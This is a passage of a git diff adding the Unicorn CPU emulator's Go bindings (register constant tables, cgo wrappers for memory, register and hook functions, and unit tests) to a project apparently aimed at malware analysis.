C.uc_hook(hook))) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h new file mode 100644 index 0000000..35813a0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h @@ -0,0 +1,9 @@ +uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end); +uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, 
uint64_t begin, uint64_t end, int insn); +void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user); +bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); +void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); +void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user); +uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user); +void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user); +void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go new file mode 100644 index 0000000..36ba914 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go @@ -0,0 +1,27 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.go] +const ( + +// M68K registers + + M68K_REG_INVALID = 0 + M68K_REG_A0 = 1 + M68K_REG_A1 = 2 + M68K_REG_A2 = 3 + M68K_REG_A3 = 4 + M68K_REG_A4 = 5 + M68K_REG_A5 = 6 + M68K_REG_A6 = 7 + M68K_REG_A7 = 8 + M68K_REG_D0 = 9 + M68K_REG_D1 = 10 + M68K_REG_D2 = 11 + M68K_REG_D3 = 12 + M68K_REG_D4 = 13 + M68K_REG_D5 = 14 + M68K_REG_D6 = 15 + M68K_REG_D7 = 16 + M68K_REG_SR = 17 + M68K_REG_PC = 18 + M68K_REG_ENDING = 19 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go new file mode 100644 index 0000000..df3f2c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go @@ -0,0 +1,200 @@ +package unicorn +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [mips_const.go] +const ( + +// MIPS registers + + MIPS_REG_INVALID = 0 + +// General purpose registers + MIPS_REG_PC = 1 + MIPS_REG_0 = 2 + MIPS_REG_1 = 3 + MIPS_REG_2 = 4 + MIPS_REG_3 = 5 + MIPS_REG_4 = 6 + MIPS_REG_5 = 7 + MIPS_REG_6 = 8 + MIPS_REG_7 = 9 + MIPS_REG_8 = 10 + MIPS_REG_9 = 11 + MIPS_REG_10 = 12 + MIPS_REG_11 = 13 + MIPS_REG_12 = 14 + MIPS_REG_13 = 15 + MIPS_REG_14 = 16 + MIPS_REG_15 = 17 + MIPS_REG_16 = 18 + MIPS_REG_17 = 19 + MIPS_REG_18 = 20 + MIPS_REG_19 = 21 + MIPS_REG_20 = 22 + MIPS_REG_21 = 23 + MIPS_REG_22 = 24 + MIPS_REG_23 = 25 + MIPS_REG_24 = 26 + MIPS_REG_25 = 27 + MIPS_REG_26 = 28 + MIPS_REG_27 = 29 + MIPS_REG_28 = 30 + MIPS_REG_29 = 31 + MIPS_REG_30 = 32 + MIPS_REG_31 = 33 + +// DSP registers + MIPS_REG_DSPCCOND = 34 + MIPS_REG_DSPCARRY = 35 + MIPS_REG_DSPEFI = 36 + MIPS_REG_DSPOUTFLAG = 37 + MIPS_REG_DSPOUTFLAG16_19 = 38 + MIPS_REG_DSPOUTFLAG20 = 39 + MIPS_REG_DSPOUTFLAG21 = 40 + MIPS_REG_DSPOUTFLAG22 = 41 + MIPS_REG_DSPOUTFLAG23 = 42 + MIPS_REG_DSPPOS = 43 + MIPS_REG_DSPSCOUNT = 44 + +// ACC registers + MIPS_REG_AC0 = 45 + MIPS_REG_AC1 = 46 + MIPS_REG_AC2 = 47 + MIPS_REG_AC3 = 48 + +// COP registers + MIPS_REG_CC0 = 49 + MIPS_REG_CC1 = 50 + MIPS_REG_CC2 = 51 + MIPS_REG_CC3 = 52 + MIPS_REG_CC4 = 53 + MIPS_REG_CC5 = 54 + MIPS_REG_CC6 = 55 + MIPS_REG_CC7 = 56 + +// FPU registers + MIPS_REG_F0 = 57 + MIPS_REG_F1 = 58 + MIPS_REG_F2 = 59 + MIPS_REG_F3 = 60 + MIPS_REG_F4 = 61 + MIPS_REG_F5 = 62 + MIPS_REG_F6 = 63 + MIPS_REG_F7 = 64 + MIPS_REG_F8 = 65 + MIPS_REG_F9 = 66 + MIPS_REG_F10 = 67 + MIPS_REG_F11 = 68 + MIPS_REG_F12 = 69 + MIPS_REG_F13 = 70 + MIPS_REG_F14 = 71 + MIPS_REG_F15 = 72 + MIPS_REG_F16 = 73 + MIPS_REG_F17 = 74 + MIPS_REG_F18 = 75 + MIPS_REG_F19 = 76 + MIPS_REG_F20 = 77 + MIPS_REG_F21 = 78 + MIPS_REG_F22 = 79 + MIPS_REG_F23 = 80 + MIPS_REG_F24 = 81 + MIPS_REG_F25 = 82 + MIPS_REG_F26 = 83 + MIPS_REG_F27 = 84 + MIPS_REG_F28 = 85 + MIPS_REG_F29 = 86 + MIPS_REG_F30 = 87 + MIPS_REG_F31 = 88 + 
MIPS_REG_FCC0 = 89 + MIPS_REG_FCC1 = 90 + MIPS_REG_FCC2 = 91 + MIPS_REG_FCC3 = 92 + MIPS_REG_FCC4 = 93 + MIPS_REG_FCC5 = 94 + MIPS_REG_FCC6 = 95 + MIPS_REG_FCC7 = 96 + +// AFPR128 + MIPS_REG_W0 = 97 + MIPS_REG_W1 = 98 + MIPS_REG_W2 = 99 + MIPS_REG_W3 = 100 + MIPS_REG_W4 = 101 + MIPS_REG_W5 = 102 + MIPS_REG_W6 = 103 + MIPS_REG_W7 = 104 + MIPS_REG_W8 = 105 + MIPS_REG_W9 = 106 + MIPS_REG_W10 = 107 + MIPS_REG_W11 = 108 + MIPS_REG_W12 = 109 + MIPS_REG_W13 = 110 + MIPS_REG_W14 = 111 + MIPS_REG_W15 = 112 + MIPS_REG_W16 = 113 + MIPS_REG_W17 = 114 + MIPS_REG_W18 = 115 + MIPS_REG_W19 = 116 + MIPS_REG_W20 = 117 + MIPS_REG_W21 = 118 + MIPS_REG_W22 = 119 + MIPS_REG_W23 = 120 + MIPS_REG_W24 = 121 + MIPS_REG_W25 = 122 + MIPS_REG_W26 = 123 + MIPS_REG_W27 = 124 + MIPS_REG_W28 = 125 + MIPS_REG_W29 = 126 + MIPS_REG_W30 = 127 + MIPS_REG_W31 = 128 + MIPS_REG_HI = 129 + MIPS_REG_LO = 130 + MIPS_REG_P0 = 131 + MIPS_REG_P1 = 132 + MIPS_REG_P2 = 133 + MIPS_REG_MPL0 = 134 + MIPS_REG_MPL1 = 135 + MIPS_REG_MPL2 = 136 + MIPS_REG_CP0_CONFIG3 = 137 + MIPS_REG_CP0_USERLOCAL = 138 + MIPS_REG_ENDING = 139 + MIPS_REG_ZERO = 2 + MIPS_REG_AT = 3 + MIPS_REG_V0 = 4 + MIPS_REG_V1 = 5 + MIPS_REG_A0 = 6 + MIPS_REG_A1 = 7 + MIPS_REG_A2 = 8 + MIPS_REG_A3 = 9 + MIPS_REG_T0 = 10 + MIPS_REG_T1 = 11 + MIPS_REG_T2 = 12 + MIPS_REG_T3 = 13 + MIPS_REG_T4 = 14 + MIPS_REG_T5 = 15 + MIPS_REG_T6 = 16 + MIPS_REG_T7 = 17 + MIPS_REG_S0 = 18 + MIPS_REG_S1 = 19 + MIPS_REG_S2 = 20 + MIPS_REG_S3 = 21 + MIPS_REG_S4 = 22 + MIPS_REG_S5 = 23 + MIPS_REG_S6 = 24 + MIPS_REG_S7 = 25 + MIPS_REG_T8 = 26 + MIPS_REG_T9 = 27 + MIPS_REG_K0 = 28 + MIPS_REG_K1 = 29 + MIPS_REG_GP = 30 + MIPS_REG_SP = 31 + MIPS_REG_FP = 32 + MIPS_REG_S8 = 32 + MIPS_REG_RA = 33 + MIPS_REG_HI0 = 45 + MIPS_REG_HI1 = 46 + MIPS_REG_HI2 = 47 + MIPS_REG_HI3 = 48 + MIPS_REG_LO0 = 45 + MIPS_REG_LO1 = 46 + MIPS_REG_LO2 = 47 + MIPS_REG_LO3 = 48 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go 
b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go new file mode 100644 index 0000000..f5f6c8d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/reg_batch.go @@ -0,0 +1,95 @@ +package unicorn + +import ( + "errors" + "runtime" + "unsafe" +) + +/* +#include + +void *reg_batch_setup(int *regs, int count, uint64_t **vals, int **enums, void ***refs) { + size_t uvsz = sizeof(uint64_t) * count; + size_t ensz = sizeof(int) * count; + size_t ursz = sizeof(uintptr_t) * count; + int i; + + uintptr_t buf = (uintptr_t)calloc(1, uvsz+ensz+ursz); + if (buf == 0) return NULL; + + *vals = (uint64_t *)buf; + *enums = (int *)(buf + uvsz); + *refs = (void **)(buf + uvsz + ensz); + for (i = 0; i < count; i++) { + (*enums)[i] = regs[i]; + (*refs)[i] = &(*vals)[i]; + } + return (void *)buf; +} +*/ +import "C" + +type RegBatch struct { + // cast to local type + vals []uint64 + + // pass these to C + cenums *C.int + crefs *unsafe.Pointer + ccount C.int +} + +func regBatchSetup(regs []int) (buf unsafe.Pointer, vals []uint64, cenums *C.int, crefs *unsafe.Pointer) { + enums := make([]C.int, len(regs)) + for i := 0; i < len(regs); i++ { + enums[i] = C.int(regs[i]) + } + var cvals *C.uint64_t + var inEnums *C.int + if len(regs) > 0 { + inEnums = (*C.int)(unsafe.Pointer(&enums[0])) + } + buf = C.reg_batch_setup(inEnums, C.int(len(regs)), &cvals, &cenums, &crefs) + vals = (*[1 << 24]uint64)(unsafe.Pointer(cvals))[:len(regs)] + return +} + +func NewRegBatch(regs []int) (*RegBatch, error) { + r := &RegBatch{} + var buf unsafe.Pointer + buf, r.vals, r.cenums, r.crefs = regBatchSetup(regs) + if buf == nil { + return nil, errors.New("failed to allocate RegBatch memory") + } + r.ccount = C.int(len(regs)) + // when RegBatch is collected, free C-owned data + runtime.SetFinalizer(r, func(r *RegBatch) { + C.free(buf) + }) + return r, nil +} + +// ReadFast skips copying and returns the internal vals array +func (r *RegBatch) ReadFast(u Unicorn) ([]uint64, 
error) { + ucerr := C.uc_reg_read_batch(u.Handle(), r.cenums, r.crefs, r.ccount) + if ucerr != ERR_OK { + return nil, errReturn(ucerr) + } + return r.vals, nil +} + +func (r *RegBatch) Read(u Unicorn, vals []uint64) error { + tmp, err := r.ReadFast(u) + if err != nil { + return err + } + copy(vals, tmp[:len(vals)]) + return nil +} + +func (r *RegBatch) Write(u Unicorn, vals []uint64) error { + copy(r.vals[:len(vals)], vals) + ucerr := C.uc_reg_write_batch(u.Handle(), r.cenums, r.crefs, r.ccount) + return errReturn(ucerr) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go new file mode 100644 index 0000000..afd94f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/sparc_const.go @@ -0,0 +1,99 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.go] +const ( + +// SPARC registers + + SPARC_REG_INVALID = 0 + SPARC_REG_F0 = 1 + SPARC_REG_F1 = 2 + SPARC_REG_F2 = 3 + SPARC_REG_F3 = 4 + SPARC_REG_F4 = 5 + SPARC_REG_F5 = 6 + SPARC_REG_F6 = 7 + SPARC_REG_F7 = 8 + SPARC_REG_F8 = 9 + SPARC_REG_F9 = 10 + SPARC_REG_F10 = 11 + SPARC_REG_F11 = 12 + SPARC_REG_F12 = 13 + SPARC_REG_F13 = 14 + SPARC_REG_F14 = 15 + SPARC_REG_F15 = 16 + SPARC_REG_F16 = 17 + SPARC_REG_F17 = 18 + SPARC_REG_F18 = 19 + SPARC_REG_F19 = 20 + SPARC_REG_F20 = 21 + SPARC_REG_F21 = 22 + SPARC_REG_F22 = 23 + SPARC_REG_F23 = 24 + SPARC_REG_F24 = 25 + SPARC_REG_F25 = 26 + SPARC_REG_F26 = 27 + SPARC_REG_F27 = 28 + SPARC_REG_F28 = 29 + SPARC_REG_F29 = 30 + SPARC_REG_F30 = 31 + SPARC_REG_F31 = 32 + SPARC_REG_F32 = 33 + SPARC_REG_F34 = 34 + SPARC_REG_F36 = 35 + SPARC_REG_F38 = 36 + SPARC_REG_F40 = 37 + SPARC_REG_F42 = 38 + SPARC_REG_F44 = 39 + SPARC_REG_F46 = 40 + SPARC_REG_F48 = 41 + SPARC_REG_F50 = 42 + SPARC_REG_F52 = 43 + SPARC_REG_F54 = 44 + SPARC_REG_F56 = 45 + SPARC_REG_F58 = 46 + SPARC_REG_F60 = 47 + SPARC_REG_F62 = 48 + 
SPARC_REG_FCC0 = 49 + SPARC_REG_FCC1 = 50 + SPARC_REG_FCC2 = 51 + SPARC_REG_FCC3 = 52 + SPARC_REG_G0 = 53 + SPARC_REG_G1 = 54 + SPARC_REG_G2 = 55 + SPARC_REG_G3 = 56 + SPARC_REG_G4 = 57 + SPARC_REG_G5 = 58 + SPARC_REG_G6 = 59 + SPARC_REG_G7 = 60 + SPARC_REG_I0 = 61 + SPARC_REG_I1 = 62 + SPARC_REG_I2 = 63 + SPARC_REG_I3 = 64 + SPARC_REG_I4 = 65 + SPARC_REG_I5 = 66 + SPARC_REG_FP = 67 + SPARC_REG_I7 = 68 + SPARC_REG_ICC = 69 + SPARC_REG_L0 = 70 + SPARC_REG_L1 = 71 + SPARC_REG_L2 = 72 + SPARC_REG_L3 = 73 + SPARC_REG_L4 = 74 + SPARC_REG_L5 = 75 + SPARC_REG_L6 = 76 + SPARC_REG_L7 = 77 + SPARC_REG_O0 = 78 + SPARC_REG_O1 = 79 + SPARC_REG_O2 = 80 + SPARC_REG_O3 = 81 + SPARC_REG_O4 = 82 + SPARC_REG_O5 = 83 + SPARC_REG_SP = 84 + SPARC_REG_O7 = 85 + SPARC_REG_Y = 86 + SPARC_REG_XCC = 87 + SPARC_REG_PC = 88 + SPARC_REG_ENDING = 89 + SPARC_REG_O6 = 84 + SPARC_REG_I6 = 67 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c new file mode 100644 index 0000000..d21e66f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.c @@ -0,0 +1,25 @@ +#include +#include +#include "_cgo_export.h" + +uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count) { + void **val_ref = malloc(sizeof(void *) * count); + int i; + for (i = 0; i < count; i++) { + val_ref[i] = (void *)&val_out[i]; + } + uc_err ret = uc_reg_read_batch(handle, regs, val_ref, count); + free(val_ref); + return ret; +} + +uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count) { + void **val_ref = malloc(sizeof(void *) * count); + int i; + for (i = 0; i < count; i++) { + val_ref[i] = (void *)&val_in[i]; + } + uc_err ret = uc_reg_write_batch(handle, regs, (void *const *)val_ref, count); + free(val_ref); + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h 
b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h new file mode 100644 index 0000000..0602234 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/uc.h @@ -0,0 +1,2 @@ +uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count); +uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go new file mode 100644 index 0000000..5c20ab6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn.go @@ -0,0 +1,235 @@ +package unicorn + +import ( + "runtime" + "sync" + "unsafe" +) + +/* +#cgo CFLAGS: -O3 -Wall -Werror -I../../../include +#cgo LDFLAGS: -L../../../ -lunicorn +#cgo linux LDFLAGS: -L../../../ -lunicorn -lrt +#include +#include "uc.h" +*/ +import "C" + +type UcError C.uc_err + +func (u UcError) Error() string { + return C.GoString(C.uc_strerror(C.uc_err(u))) +} + +func errReturn(err C.uc_err) error { + if err != ERR_OK { + return UcError(err) + } + return nil +} + +type MemRegion struct { + Begin, End uint64 + Prot int +} + +type Unicorn interface { + MemMap(addr, size uint64) error + MemMapProt(addr, size uint64, prot int) error + MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error + MemProtect(addr, size uint64, prot int) error + MemUnmap(addr, size uint64) error + MemRegions() ([]*MemRegion, error) + MemRead(addr, size uint64) ([]byte, error) + MemReadInto(dst []byte, addr uint64) error + MemWrite(addr uint64, data []byte) error + RegRead(reg int) (uint64, error) + RegReadBatch(regs []int) ([]uint64, error) + RegWrite(reg int, value uint64) error + RegWriteBatch(regs []int, vals []uint64) error + RegReadMmr(reg int) (*X86Mmr, error) + RegWriteMmr(reg int, value *X86Mmr) error + Start(begin, until uint64) error + StartWithOptions(begin, until uint64, options 
*UcOptions) error + Stop() error + HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) + HookDel(hook Hook) error + Query(queryType int) (uint64, error) + Close() error + + ContextSave(reuse Context) (Context, error) + ContextRestore(Context) error + Handle() *C.uc_engine + RegWriteX86Msr(reg uint64, val uint64) error + RegReadX86Msr(reg uint64) (uint64, error) +} + +type uc struct { + handle *C.uc_engine + final sync.Once + hooks map[Hook]uintptr +} + +type UcOptions struct { + Timeout, Count uint64 +} + +func Version() (int, int) { + var major, minor C.uint + C.uc_version(&major, &minor) + return int(major), int(minor) +} + +func NewUnicorn(arch, mode int) (Unicorn, error) { + major, minor := Version() + if major != C.UC_API_MAJOR || minor != C.UC_API_MINOR { + return nil, UcError(ERR_VERSION) + } + var handle *C.uc_engine + if ucerr := C.uc_open(C.uc_arch(arch), C.uc_mode(mode), &handle); ucerr != ERR_OK { + return nil, UcError(ucerr) + } + u := &uc{handle: handle, hooks: make(map[Hook]uintptr)} + runtime.SetFinalizer(u, func(u *uc) { u.Close() }) + return u, nil +} + +func (u *uc) Close() (err error) { + u.final.Do(func() { + if u.handle != nil { + for _, uptr := range u.hooks { + hookMap.remove(uptr) + } + u.hooks = nil + err = errReturn(C.uc_close(u.handle)) + u.handle = nil + } + }) + return err +} + +func (u *uc) StartWithOptions(begin, until uint64, options *UcOptions) error { + ucerr := C.uc_emu_start(u.handle, C.uint64_t(begin), C.uint64_t(until), C.uint64_t(options.Timeout), C.size_t(options.Count)) + return errReturn(ucerr) +} + +func (u *uc) Start(begin, until uint64) error { + return u.StartWithOptions(begin, until, &UcOptions{}) +} + +func (u *uc) Stop() error { + return errReturn(C.uc_emu_stop(u.handle)) +} + +func (u *uc) RegWrite(reg int, value uint64) error { + var val C.uint64_t = C.uint64_t(value) + ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) + return errReturn(ucerr) +} + +func (u *uc) 
RegRead(reg int) (uint64, error) { + var val C.uint64_t + ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) + return uint64(val), errReturn(ucerr) +} + +func (u *uc) RegWriteBatch(regs []int, vals []uint64) error { + if len(regs) == 0 { + return nil + } + if len(vals) < len(regs) { + regs = regs[:len(vals)] + } + cregs := make([]C.int, len(regs)) + for i, v := range regs { + cregs[i] = C.int(v) + } + cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) + cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) + ucerr := C.uc_reg_write_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) + return errReturn(ucerr) +} + +func (u *uc) RegReadBatch(regs []int) ([]uint64, error) { + if len(regs) == 0 { + return nil, nil + } + cregs := make([]C.int, len(regs)) + for i, v := range regs { + cregs[i] = C.int(v) + } + cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) + vals := make([]uint64, len(regs)) + cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) + ucerr := C.uc_reg_read_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) + return vals, errReturn(ucerr) +} + +func (u *uc) MemRegions() ([]*MemRegion, error) { + var regions *C.uc_mem_region + var count C.uint32_t + ucerr := C.uc_mem_regions(u.handle, ®ions, &count) + if ucerr != C.UC_ERR_OK { + return nil, errReturn(ucerr) + } + ret := make([]*MemRegion, count) + tmp := (*[1 << 24]C.struct_uc_mem_region)(unsafe.Pointer(regions))[:count] + for i, v := range tmp { + ret[i] = &MemRegion{ + Begin: uint64(v.begin), + End: uint64(v.end), + Prot: int(v.perms), + } + } + C.uc_free(unsafe.Pointer(regions)) + return ret, nil +} + +func (u *uc) MemWrite(addr uint64, data []byte) error { + if len(data) == 0 { + return nil + } + return errReturn(C.uc_mem_write(u.handle, C.uint64_t(addr), unsafe.Pointer(&data[0]), C.size_t(len(data)))) +} + +func (u *uc) MemReadInto(dst []byte, addr uint64) error { + if len(dst) == 0 { + return nil + } + return errReturn(C.uc_mem_read(u.handle, C.uint64_t(addr), unsafe.Pointer(&dst[0]), 
C.size_t(len(dst)))) +} + +func (u *uc) MemRead(addr, size uint64) ([]byte, error) { + dst := make([]byte, size) + return dst, u.MemReadInto(dst, addr) +} + +func (u *uc) MemMapProt(addr, size uint64, prot int) error { + return errReturn(C.uc_mem_map(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) +} + +func (u *uc) MemMap(addr, size uint64) error { + return u.MemMapProt(addr, size, PROT_ALL) +} + +func (u *uc) MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error { + return errReturn(C.uc_mem_map_ptr(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot), ptr)) +} + +func (u *uc) MemProtect(addr, size uint64, prot int) error { + return errReturn(C.uc_mem_protect(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) +} + +func (u *uc) MemUnmap(addr, size uint64) error { + return errReturn(C.uc_mem_unmap(u.handle, C.uint64_t(addr), C.size_t(size))) +} + +func (u *uc) Query(queryType int) (uint64, error) { + var ret C.size_t + ucerr := C.uc_query(u.handle, C.uc_query_type(queryType), &ret) + return uint64(ret), errReturn(ucerr) +} + +func (u *uc) Handle() *C.uc_engine { + return u.handle +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go new file mode 100644 index 0000000..ebc2af2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_const.go @@ -0,0 +1,111 @@ +package unicorn +// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.go] +const ( + API_MAJOR = 1 + + API_MINOR = 0 + VERSION_MAJOR = 1 + + VERSION_MINOR = 0 + VERSION_EXTRA = 2 + SECOND_SCALE = 1000000 + MILISECOND_SCALE = 1000 + ARCH_ARM = 1 + ARCH_ARM64 = 2 + ARCH_MIPS = 3 + ARCH_X86 = 4 + ARCH_PPC = 5 + ARCH_SPARC = 6 + ARCH_M68K = 7 + ARCH_MAX = 8 + + MODE_LITTLE_ENDIAN = 0 + MODE_BIG_ENDIAN = 1073741824 + + MODE_ARM = 0 + MODE_THUMB = 16 + MODE_MCLASS = 32 + MODE_V8 = 64 + MODE_ARM926 = 128 + MODE_ARM946 = 256 + MODE_ARM1176 = 512 + MODE_MICRO = 16 + MODE_MIPS3 = 32 + MODE_MIPS32R6 = 64 + MODE_MIPS32 = 4 + MODE_MIPS64 = 8 + MODE_16 = 2 + MODE_32 = 4 + MODE_64 = 8 + MODE_PPC32 = 4 + MODE_PPC64 = 8 + MODE_QPX = 16 + MODE_SPARC32 = 4 + MODE_SPARC64 = 8 + MODE_V9 = 16 + + ERR_OK = 0 + ERR_NOMEM = 1 + ERR_ARCH = 2 + ERR_HANDLE = 3 + ERR_MODE = 4 + ERR_VERSION = 5 + ERR_READ_UNMAPPED = 6 + ERR_WRITE_UNMAPPED = 7 + ERR_FETCH_UNMAPPED = 8 + ERR_HOOK = 9 + ERR_INSN_INVALID = 10 + ERR_MAP = 11 + ERR_WRITE_PROT = 12 + ERR_READ_PROT = 13 + ERR_FETCH_PROT = 14 + ERR_ARG = 15 + ERR_READ_UNALIGNED = 16 + ERR_WRITE_UNALIGNED = 17 + ERR_FETCH_UNALIGNED = 18 + ERR_HOOK_EXIST = 19 + ERR_RESOURCE = 20 + ERR_EXCEPTION = 21 + MEM_READ = 16 + MEM_WRITE = 17 + MEM_FETCH = 18 + MEM_READ_UNMAPPED = 19 + MEM_WRITE_UNMAPPED = 20 + MEM_FETCH_UNMAPPED = 21 + MEM_WRITE_PROT = 22 + MEM_READ_PROT = 23 + MEM_FETCH_PROT = 24 + MEM_READ_AFTER = 25 + HOOK_INTR = 1 + HOOK_INSN = 2 + HOOK_CODE = 4 + HOOK_BLOCK = 8 + HOOK_MEM_READ_UNMAPPED = 16 + HOOK_MEM_WRITE_UNMAPPED = 32 + HOOK_MEM_FETCH_UNMAPPED = 64 + HOOK_MEM_READ_PROT = 128 + HOOK_MEM_WRITE_PROT = 256 + HOOK_MEM_FETCH_PROT = 512 + HOOK_MEM_READ = 1024 + HOOK_MEM_WRITE = 2048 + HOOK_MEM_FETCH = 4096 + HOOK_MEM_READ_AFTER = 8192 + HOOK_INSN_INVALID = 16384 + HOOK_MEM_UNMAPPED = 112 + HOOK_MEM_PROT = 896 + HOOK_MEM_READ_INVALID = 144 + HOOK_MEM_WRITE_INVALID = 288 + HOOK_MEM_FETCH_INVALID = 576 + HOOK_MEM_INVALID = 1008 + HOOK_MEM_VALID = 7168 + QUERY_MODE = 1 + 
QUERY_PAGE_SIZE = 2 + QUERY_ARCH = 3 + QUERY_TIMEOUT = 4 + + PROT_NONE = 0 + PROT_READ = 1 + PROT_WRITE = 2 + PROT_EXEC = 4 + PROT_ALL = 7 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go new file mode 100644 index 0000000..fd65207 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/unicorn_test.go @@ -0,0 +1,74 @@ +package unicorn + +import ( + "testing" +) + +func TestMemUnmap(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + if err := mu.MemMap(0x1000, 0x1000); err != nil { + t.Fatal(err) + } + tmp := make([]byte, 1024) + if err := mu.MemWrite(0x1000, tmp); err != nil { + t.Fatal(err) + } + if err := mu.MemUnmap(0x1000, 0x1000); err != nil { + t.Fatal(err) + } + if err := mu.MemWrite(0x1000, tmp); err.(UcError) != ERR_WRITE_UNMAPPED { + t.Fatalf("Expected ERR_WRITE_UNMAPPED, got: %v", err) + } +} + +func TestDoubleClose(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + if err := mu.Close(); err != nil { + t.Fatal(err) + } + if err := mu.Close(); err != nil { + t.Fatal(err) + } +} + +func TestMemRegions(t *testing.T) { + mu, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + err = mu.MemMap(0x1000, 0x1000) + if err != nil { + t.Fatal(err) + } + regions, err := mu.MemRegions() + if err != nil { + t.Fatal(err) + } + if len(regions) != 1 { + t.Fatalf("returned wrong number of regions: %d != 1", len(regions)) + } + r := regions[0] + if r.Begin != 0x1000 || r.End != 0x1fff || r.Prot != 7 { + t.Fatalf("incorrect region: %#v", r) + } +} + +func TestQuery(t *testing.T) { + mu, err := NewUnicorn(ARCH_ARM, MODE_THUMB) + if err != nil { + t.Fatal(err) + } + mode, err := mu.Query(QUERY_MODE) + if err != nil { + t.Fatal(err) + } + if mode != MODE_THUMB { + t.Fatalf("query returned 
